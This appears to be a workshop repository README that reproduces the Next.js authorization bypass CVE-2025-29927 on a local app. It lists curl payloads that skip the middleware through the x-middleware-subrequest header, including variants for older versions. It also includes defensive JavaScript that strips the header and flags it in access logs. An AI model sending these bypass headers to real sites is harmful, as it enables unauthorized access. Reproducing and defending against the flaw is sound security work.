MinDAICA/workshop

CVE-2025-29927 Authorization Bypass reproduction

This repository reproduces CVE-2025-29927, an authorization bypass vulnerability in the next (Next.js) package.

How to reproduce

  1. Follow the Getting Started steps below to clone and run the Next.js application.
  2. Check that authorization denies access to the /api/hello endpoint when no token is sent:

     $ curl http://localhost:3000/api/hello

     {"error":"Unauthorized"}%
  3. Check that authorization succeeds when a token is provided:

     $ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

     {"message":"Hello World"}%
  4. The same check can now also be bypassed by repeating the middleware name five times in the special x-middleware-subrequest header:

     $ curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

     {"message":"Hello, World"}

CVE-2025-29927 exploitation for older Next.js versions

Next.js 12 and 13 used a different naming convention for the middleware file (_middleware.js), which was changed to middleware.js in Next.js 14. The vulnerability can be exploited in older versions by referencing the _middleware.js file name instead.

For example, the following payloads apply, depending on the Next.js version and your routing convention:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (for Next.js 12.2 with the middleware.js file in the root of the app, not inside the pages directory)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello (same, with the file under the src directory)
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (for Next.js 11 up to 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello
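To make the behaviour behind the payloads in the two sections above concrete from a defender's side, here is an added example that is not part of this repository and not Next.js's own code: a simplified JavaScript model of the recursion-depth check that the header manipulates (both the five-repetition form for current versions and the single-name form for older versions), the header-stripping filter a reverse proxy or gateway should apply in front of an unpatched app, and a check over constructed access-log lines. The constant name MAX_RECURSION_DEPTH, the header-parsing details, the key=value log format and the sample requests and log lines are assumptions made for this example.

```javascript
// Added example: a simplified model of the recursion-depth check behind
// CVE-2025-29927, plus the edge-side filter and log check a defender would
// want. This is NOT the MinDAICA/workshop repo's code and NOT Next.js's own
// implementation; MAX_RECURSION_DEPTH, the header parsing and the sample
// requests and log lines below are assumptions constructed for the example.

const SUBREQUEST_HEADER = 'x-middleware-subrequest';
// Assumed depth limit, matching the five-times-repeated name in the README.
const MAX_RECURSION_DEPTH = 5;

// Simplified model of the vulnerable check. Returns true when the middleware
// would be SKIPPED, i.e. the request reaches the route without the auth check.
// `legacy` models the older (_middleware-era) behaviour described in the README,
// where a single matching name in the header was enough.
function middlewareIsSkipped(headers, middlewareName, legacy = false) {
  const raw = headers[SUBREQUEST_HEADER];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  if (legacy) {
    return subrequests.includes(middlewareName);
  }
  const depth = subrequests.filter((name) => name === middlewareName).length;
  return depth >= MAX_RECURSION_DEPTH;
}

// Edge-side mitigation while upgrading: the header is only meaningful for
// Next.js's own internal subrequests, so a reverse proxy or gateway in front
// of the app should never forward it from an external client. Returns a
// sanitized copy of the headers and whether anything was removed.
function sanitizeInboundHeaders(headers) {
  const clean = {};
  let stripped = false;
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === SUBREQUEST_HEADER) {
      stripped = true;
      continue;
    }
    clean[name] = value;
  }
  return { headers: clean, stripped };
}

// Detection over access logs: any external request carrying the header is
// suspicious, so flag every occurrence and report how many entries it holds.
// The log format (header logged as key=value) is an assumption for this example.
function findSubrequestHeaderUse(logLines) {
  const re = /x-middleware-subrequest=([^\s"]+)/i;
  const hits = [];
  for (const line of logLines) {
    const m = line.match(re);
    if (m) {
      hits.push({ line, value: m[1], entries: m[1].split(':').length });
    }
  }
  return hits;
}

// Constructed sample requests (Node lower-cases incoming header names).
const BYPASS_ATTEMPT = {
  host: 'localhost:3000',
  'x-middleware-subrequest': 'middleware:middleware:middleware:middleware:middleware',
};
const NORMAL_REQUEST = { host: 'localhost:3000', authorization: 'my-jwt-token-here' };

// Constructed sample access-log lines.
const SAMPLE_LOG = [
  '2025-03-22T10:00:01Z 203.0.113.7 GET /api/hello 401',
  '2025-03-22T10:00:09Z 203.0.113.7 GET /api/hello 200 ' +
    'x-middleware-subrequest=middleware:middleware:middleware:middleware:middleware',
  '2025-03-22T10:00:15Z 198.51.100.2 GET /api/hello 200 x-middleware-subrequest=pages/_middleware',
];

console.log('bypass attempt skips middleware:', middlewareIsSkipped(BYPASS_ATTEMPT, 'middleware'));
console.log('normal request skips middleware:', middlewareIsSkipped(NORMAL_REQUEST, 'middleware'));
console.log('after edge sanitizing:',
  middlewareIsSkipped(sanitizeInboundHeaders(BYPASS_ATTEMPT).headers, 'middleware'));
console.log('flagged log lines:', findSubrequestHeaderUse(SAMPLE_LOG).map((h) => h.value));
```

Run it with node to see the three checks. The point to take away is that the header is an internal signal with no legitimate use from outside, so it should be dropped at the edge (in addition to upgrading the dependency), and any external request carrying it deserves an alert regardless of how many entries it contains.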

Getting Started

First, run the development server:

npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Open http://localhost:3000 with your browser to see the result.

You can start editing the page by modifying app/page.js. The page auto-updates as you edit the file.

This project uses next/font to automatically optimize and load Geist, a new font family for Vercel.

Learn More

To learn more about Next.js, take a look at the following resources:

You can check out the Next.js GitHub repository - your feedback and contributions are welcome!

Deploy on Vercel

The easiest way to deploy your Next.js app is to use the Vercel Platform from the creators of Next.js.

Check out our Next.js deployment documentation for more details.

About

FPTJetking-demo

Languages

  • JavaScript 100.0%